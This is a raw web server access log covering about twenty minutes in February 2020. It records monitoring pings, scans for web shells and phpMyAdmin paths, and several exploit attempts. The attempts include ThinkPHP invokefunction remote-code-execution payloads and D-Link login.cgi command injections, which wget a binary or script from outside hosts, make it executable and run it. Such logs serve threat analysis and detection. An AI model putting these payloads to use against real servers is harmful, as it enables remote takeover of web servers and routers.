119.5.138.60 - - [04/Feb/2020:15:49:44 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:15:50:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.51.5.160 - - [04/Feb/2020:15:50:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:15:51:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:52:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:54:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:55:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:56:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Feb/2020:15:57:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.35.173.136 - - [04/Feb/2020:15:58:39 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:15:58:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.20.76.234 - - [04/Feb/2020:15:59:04 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [04/Feb/2020:15:59:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
187.102.55.4 - - [04/Feb/2020:16:00:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:00:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.116.90.238 - - [04/Feb/2020:16:00:49 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [04/Feb/2020:16:01:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.112.150.75 - - [04/Feb/2020:16:01:47 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
125.72.69.122 - - [04/Feb/2020:16:02:12 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
125.72.69.122 - - [04/Feb/2020:16:02:15 +0100] "POST /Admin52f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
125.72.69.122 - - [04/Feb/2020:16:02:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
125.72.69.122 - - [04/Feb/2020:16:02:37 +0100] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
125.72.69.122 - - [04/Feb/2020:16:02:39 +0100] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
125.72.69.122 - - [04/Feb/2020:16:02:39 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
125.72.69.122 - - [04/Feb/2020:16:02:39 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
212.91.246.72 - - [04/Feb/2020:16:02:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:03:01 +0100] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
125.72.69.122 - - [04/Feb/2020:16:03:23 +0100] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
86.120.44.244 - - [04/Feb/2020:16:03:29 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
41.206.44.62 - - [04/Feb/2020:16:03:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
171.100.12.210 - - [04/Feb/2020:16:03:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [04/Feb/2020:16:03:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:03:44 +0100] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
125.72.69.122 - - [04/Feb/2020:16:04:06 +0100] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
112.72.95.111 - - [04/Feb/2020:16:04:20 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
125.72.69.122 - - [04/Feb/2020:16:04:36 +0100] "GET /webdav/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
101.108.252.160 - - [04/Feb/2020:16:04:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [04/Feb/2020:16:04:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:04:45 +0100] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:04:49 +0100] "GET /db_cts.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:07 +0100] "GET /db_pma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:08 +0100] "GET /logon.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:08 +0100] "GET /help-e.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:08 +0100] "GET /license.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:08 +0100] "GET /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:08 +0100] "GET /hell.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:09 +0100] "GET /pmd_online.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:09 +0100] "GET /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:10 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:10 +0100] "GET /htdocs.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:10 +0100] "GET /b.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:10 +0100] "GET /sane.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:11 +0100] "GET /desktop.ini.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:11 +0100] "GET /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:11 +0100] "GET /lala.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:11 +0100] "GET /lala-dpr.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:12 +0100] "GET /wpc.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:12 +0100] "GET /wpo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:13 +0100] "GET /t6nv.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:13 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:13 +0100] "GET /text.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:14 +0100] "GET /wp-config.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:14 +0100] "GET /muhstik.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:15 +0100] "GET /muhstik2.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:15 +0100] "GET /muhstiks.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:15 +0100] "GET /muhstik-dpr.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:15 +0100] "GET /lol.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:17 +0100] "GET /uploader.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:19 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:19 +0100] "GET /cmv.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:19 +0100] "GET /cmdd.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:20 +0100] "GET /knal.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:20 +0100] "GET /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:21 +0100] "GET /shell.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:22 +0100] "GET /appserv.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:22 +0100] "GET /scripts/setup.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:23 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:30 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
212.91.246.72 - - [04/Feb/2020:16:05:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:05:51 +0100] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:54 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:54 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:58 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:59 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:59 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:05:59 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:01 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:01 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:01 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:02 +0100] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:02 +0100] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 334 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:02 +0100] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 340 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:03 +0100] "GET /weathermap/editor.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:03 +0100] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:03 +0100] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:04 +0100] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:05 +0100] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
220.116.93.35 - - [04/Feb/2020:16:06:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.176.25/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
220.116.93.35 - - [04/Feb/2020:16:06:09 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.176.25/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
125.72.69.122 - - [04/Feb/2020:16:06:11 +0100] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:11 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
220.116.93.35 - - [04/Feb/2020:16:06:15 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.176.25/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
220.116.93.35 - - [04/Feb/2020:16:06:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.168.176.25/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
125.72.69.122 - - [04/Feb/2020:16:06:38 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:39 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:39 +0100] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:39 +0100] "GET /d7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:39 +0100] "GET /rxr.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:40 +0100] "GET /1x.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:40 +0100] "GET /home.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:40 +0100] "GET /undx.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
212.91.246.72 - - [04/Feb/2020:16:06:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.72.69.122 - - [04/Feb/2020:16:06:42 +0100] "GET /spider.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:44 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:44 +0100] "GET /composers.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:44 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:45 +0100] "GET /composer.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:45 +0100] "GET /hue2.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:45 +0100] "GET /Drupal.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:45 +0100] "GET /lang.php?f=1 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:46 +0100] "GET /izom.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
125.72.69.122 - - [04/Feb/2020:16:06:46 +0100] "GET /payload.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
